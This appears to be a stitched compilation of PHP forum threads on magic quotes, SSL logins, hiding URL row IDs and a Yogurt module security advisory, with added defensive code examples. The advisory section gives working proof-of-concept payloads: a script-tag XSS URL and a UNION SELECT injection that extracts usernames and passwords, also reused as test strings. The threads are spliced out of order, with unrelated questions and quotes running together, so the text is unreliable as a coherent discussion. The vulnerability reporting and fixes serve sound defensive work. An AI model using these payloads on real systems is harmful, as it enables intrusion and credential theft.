Just found that my server has magic quotes enabled. I've been looking at data sanitisation and validation lately, and my books pretty much say 'magic quotes are evil, turn them off'.
Which is fine if the software (think modules) you are running properly escapes and validates data, but as we know, sometimes it doesn't.
So what to do - leave it on, or turn it off? What do you do?
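An added example, not from the original post, of the usual way to make an application independent of the setting: undo the escaping that magic quotes applied to request data, so every value is raw user input and each sink (SQL, HTML) escapes it exactly once itself. It assumes PHP 5.x, where the setting still exists (magic_quotes_gpc was removed in PHP 5.4 and get_magic_quotes_gpc() in PHP 8; the function_exists() guard keeps the shim harmless there). The sample array at the end is constructed.

```php
<?php
// Added example (not the poster's code): normalise GPC input so the rest of
// the application never has to know whether magic_quotes_gpc is on.

function strip_magic_quotes(array $data)
{
    // Recursively reverse the addslashes() that magic quotes applied to every
    // GET/POST/COOKIE value, including nested arrays such as checkbox groups.
    $clean = array();
    foreach ($data as $key => $value) {
        $clean[$key] = is_array($value)
            ? strip_magic_quotes($value)
            : stripslashes($value);
    }
    return $clean;
}

// Run once, as early as possible (a bootstrap or prepend file).
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    $_GET     = strip_magic_quotes($_GET);
    $_POST    = strip_magic_quotes($_POST);
    $_COOKIE  = strip_magic_quotes($_COOKIE);
    $_REQUEST = strip_magic_quotes($_REQUEST);
}

// From here on the data is the raw user input, so each sink escapes for its
// own context: mysql_real_escape_string() or a prepared statement for SQL,
// htmlspecialchars() for HTML. Escaping is then applied once, not twice.

// Constructed check: data shaped the way magic quotes leaves it
// ("O\'Brien" with a backslash before the quote) comes back unescaped.
$sample = array(
    'name' => "O\\'Brien",
    'tags' => array("it\\'s", 'fine'),
);
var_dump(strip_magic_quotes($sample));
```

Where you control the server, turning the setting off is still the right answer (`magic_quotes_gpc = Off` in php.ini, or `php_flag magic_quotes_gpc Off` in a per-directory .htaccess when the host allows it); the shim above is for code that has to run on hosts where you cannot, and for modules that assume it is off.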
Of course it is, but regarding the "SSL login feature": the only encrypted thing is the login credentials.
If your server settings say that there is only one folder (httpdocs) for secure and "insecure" connections, then you can simply change the physical path in your trust path mainfile. Then you can access the site via https. The other option is to clone your whole site and put it directly into the httpsdocs folder. Then your settings must respond to this as well, i.e. search in the httpsdocs folder when entering the site via https.
There might be one thing that prevents you from running your site in SSL only: Google. If you use any kind of Google Maps service on your site, you must not do that on an SSL site; if you want to, it needs a Maps Pro account that costs approx. 10k USD per year.
This is a real issue when you want Google Maps and, for example, a shop installed on the same site. Oledrion should have the feature to run in SSL mode only while everything else uses just http; that would be fine, but: if you have an SSL certificate, a bought one I mean, then you might be displeased that on a mixed system (http and https at the same physical location) your users get a warning that not all content is encrypted.
On the other hand, when you have an SSL site and don't mind Google's rules, you may get away with a browser warning that there is non-encrypted content embedded in your SSL site, because the Maps API you get for free connects via a non-encrypted line.
It's kind of a dilemma.
Bye
Hmm...is it possible to have my whole site in SSL? Or does this only do the login?
Yes, you can.
But: if your hosting setup says that there is only one folder (the httpdocs) for SSL and non-SSL connections, then you should put the SSL login file into an exclusive folder within your document root, i.e. a folder without anything else in it. Otherwise your browser may come up with the panic notice that the connection is encrypted but there are other unencrypted files.
If your SSL place is the httpsdocs document root and you physically reach this directory when typing https in your browser, then you can put the login file wherever you want.
I hope this is 100% correct. I tried it, but maybe there are possible differences I don't know about.
Bye!
Thanks. Can I put the ssl directory in the web root for my site, or is it meant to sit outside the web root (like the trust path does)?
Hi!
No, there is one single file you have to put in your SSL-encrypted place. Example: http://www.xyz.com/ is your normal site's place; the SSL login file might reside at https://www.xyz.com
You find the file you need in the extras folder when you uncompress the ICMS install package.
Hope this helps.
Bye!
Just setting up a new site and thought, why not use the SSL login for a change. But I'm not clear on how it works:
Quote:
URL where SSL login page is located: https://
Quote:
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
Quote:
patch sql injection C:\AppServ\www\yogurt\system\writemessage.php (2 hits)
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)
############### change ################
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)
Have you tested this on the profile module included in ImpressCMS 1.2 alpha? I remember having fixed all these in it
Dear lostmon,
thanks for info. We will fix this.
patch sql injection
C:\AppServ\www\yogurt\system\writemessage.php (2 hits)
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)
###############
change
################
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)
Thank you Marcello,
tomorrow I will look at installing and patching it.
I didn't test it in ImpressCMS, but anyway I will look at patching it tomorrow.
------------------------------------------------------------------
Name : Yogurt
Site : http://sourceforge.net/projects/yogurt/
Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459
Dork : "Yogurt build"
------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
------------------------------------------------------------------
Description:
Bug : XSS
In index.php:
index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL
BUG : SQL INJECTION
system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);
In neither case was the _GET parameter filtered properly.
Other .php files also contain these flaws; I'm posting the first ones I found. ^^
------------------------------------------------------------------
P0c:
XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script>
First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli.
SQLi :
http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--
OBS: need register_globals=on;
------------------------------------------------------------------
# milw0rm.com [2009-06-11]
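As an added example (not Yogurt's own code and not the posted patch), the two flaws from the advisory above, each beside a hardened version. The `messages` table layout and the in-memory SQLite database are assumptions made so the snippet runs stand-alone; the real module talks to MySQL through the old mysql_* functions. `fetch_message()` goes one step further than the intval() patch from the thread: it refuses anything that is not a plain integer and binds the value with a prepared statement, so `original=5abc` is rejected instead of being silently read as 5.

```php
<?php
// Added example: the index.php XSS and the writemessage.php SQL injection
// from the advisory, with hardened counterparts. Table layout is assumed.

// --- XSS (index.php:48) -----------------------------------------------------
function render_msg_vulnerable(string $msg): string
{
    // Request data echoed straight into HTML: a <script> tag in ?msg= runs.
    return "<center>" . $msg . "</center>";
}

function render_msg_fixed(string $msg): string
{
    // Escape for an HTML text context. ENT_QUOTES also encodes ' and ", so
    // the same helper is safe inside attribute values.
    return "<center>" . htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "</center>";
}

// --- SQL injection (system/writemessage.php:81) -----------------------------
function build_query_vulnerable(string $original): string
{
    // $_GET['original'] concatenated into SQL: the PoC appends a UNION SELECT.
    return "SELECT * FROM messages WHERE id=" . $original;
}

function build_query_intval(string $original): string
{
    // The posted patch: intval() keeps only the leading integer, so the
    // UNION never reaches the database. Adequate for a numeric id, but it
    // accepts "5abc" as 5 without complaint.
    return "SELECT * FROM messages WHERE id=" . intval($original);
}

function fetch_message(PDO $db, string $original): ?array
{
    // Preferred fix: validate the type first, then bind the value so the
    // database parser never sees user input as part of the statement.
    if (!ctype_digit($original)) {
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM messages WHERE id = :id");
    $stmt->execute([':id' => (int) $original]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data (SQLite in memory instead of the module's MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE messages (id INTEGER PRIMARY KEY, sender TEXT, body TEXT)");
$db->exec("INSERT INTO messages VALUES (7, 'alice', 'hello')");

// The payloads from the PoC section above.
$payloadXss  = "<script>alert('br0ly')</script>";
$payloadSqli = "-1 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8 from users--";

echo render_msg_vulnerable($payloadXss), "\n";   // script tag reaches the browser
echo render_msg_fixed($payloadXss), "\n";        // rendered as inert text

echo build_query_vulnerable($payloadSqli), "\n"; // UNION reaches the database
echo build_query_intval($payloadSqli), "\n";     // only the leading -1 survives

var_dump(fetch_message($db, "7"));               // the existing row
var_dump(fetch_message($db, $payloadSqli));      // rejected before any query runs
```

The advisory's note that register_globals must be on does not apply to the two sinks shown, since both read `$_GET` directly; with register_globals on, the same input would additionally arrive as the bare variables `$msg` and `$original`, which is why that setting belongs off as well.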
I suppose adding more security checks is one of the countermeasures I will take, perhaps in addition to encrypting it.
I was afraid you'd say mod_rewrite; it's a tough piece to implement.
I had considered POST, but thought it could not be done if it were part of the dynamic row; a button on every row with a hidden variable perhaps...?
Thanks guys for the feedback!
Is exposing these variables really a problem?
I mean, it doesn't matter if a user manipulates this variable as long as you verify its integrity in the server.
For example, stop processing if the variable is not a number. If it's not a number and your code has no bugs, you can bet it has been manipulated.
Don't use it as a URL parameter; use it as a POST parameter for a form.
Whenever a dynamic grid list is built, we always dereference the ID for that row and pass it to the next page like:
"<a href=\"client.php?uid=" . $uid . "\">client</a>"
Exposing these IDs can be a security problem; what are your suggestions for hiding this information? So far I have seen:
1. Apache redirect [a little beyond me at this point....]
2. $uid = base64_encode($uid) [seems reasonable....]
Appreciate the feedback!
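An added example (not the poster's code) of the approach taken in the replies: rather than hiding the row id, make tampering with it harmless. It goes slightly beyond the thread by combining two layers. First, the server rejects anything that is not a number and ties the query to the logged-in account, so another user's id returns nothing. Second, the link carries an HMAC tag over the id, so any edited id is refused before a query is issued at all. The `clients` table, the session user id and the HMAC secret are assumptions; the database is in-memory SQLite. Note that base64_encode() only obscures the value, since anyone can decode and re-encode it, so it does not provide this check.

```php
<?php
// Added example: validate, sign and authorise a row id passed in a link.
// HMAC_KEY, the clients table and the session user are assumed.

const HMAC_KEY = 'replace-with-a-long-random-secret';   // assumed app secret

function sign_id(int $uid): string
{
    // Link parameter "<uid>.<tag>", tag = truncated HMAC-SHA256 over the id.
    $tag = substr(hash_hmac('sha256', (string) $uid, HMAC_KEY), 0, 32);
    return $uid . '.' . $tag;
}

function verify_id(string $param): ?int
{
    // Accept only "<digits>.<32 hex chars>" and only if the tag matches.
    if (!preg_match('/^(\d{1,18})\.([0-9a-f]{32})$/', $param, $m)) {
        return null;
    }
    $expected = substr(hash_hmac('sha256', $m[1], HMAC_KEY), 0, 32);
    // Constant-time compare so the tag cannot be guessed byte by byte.
    return hash_equals($expected, $m[2]) ? (int) $m[1] : null;
}

function load_client(PDO $db, int $sessionUser, string $param): ?array
{
    // Authorisation lives in the query: the row must belong to the account
    // that owns the session, not merely exist under that id.
    $uid = verify_id($param);
    if ($uid === null) {
        return null;
    }
    $stmt = $db->prepare("SELECT id, name FROM clients WHERE id = :id AND owner = :owner");
    $stmt->execute([':id' => $uid, ':owner' => $sessionUser]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed data: two accounts, one client row each.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE clients (id INTEGER PRIMARY KEY, owner INTEGER, name TEXT)");
$db->exec("INSERT INTO clients VALUES (41, 1, 'acme'), (42, 2, 'globex')");

$sessionUser = 1;   // normally taken from the server-side session

// The grid link from the question, now carrying a signed id.
echo "<a href=\"client.php?uid=" . htmlspecialchars(sign_id(41), ENT_QUOTES) . "\">client</a>\n";

var_dump(load_client($db, $sessionUser, sign_id(41)));   // the user's own row
var_dump(load_client($db, $sessionUser, sign_id(42)));   // someone else's row: denied by the WHERE clause
var_dump(load_client($db, $sessionUser, "42.deadbeef")); // tampered parameter: rejected by verify_id()
```

The ownership check is the part that matters; the HMAC only lets you distinguish a tampered link from a stale one and refuse it cheaply. The same `verify_id()` works unchanged on a hidden POST field if you prefer the form-based approach suggested above.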
Found two articles on SitePoint regarding the subject. Worth reading.
http://www.sitepoint.com/blogs/2009/05/10/googles-new-capcha-the-only-way-is-up/#comment-925430
http://www.sitepoint.com/blogs/2009/05/11/avoid-captchas/#comment-925431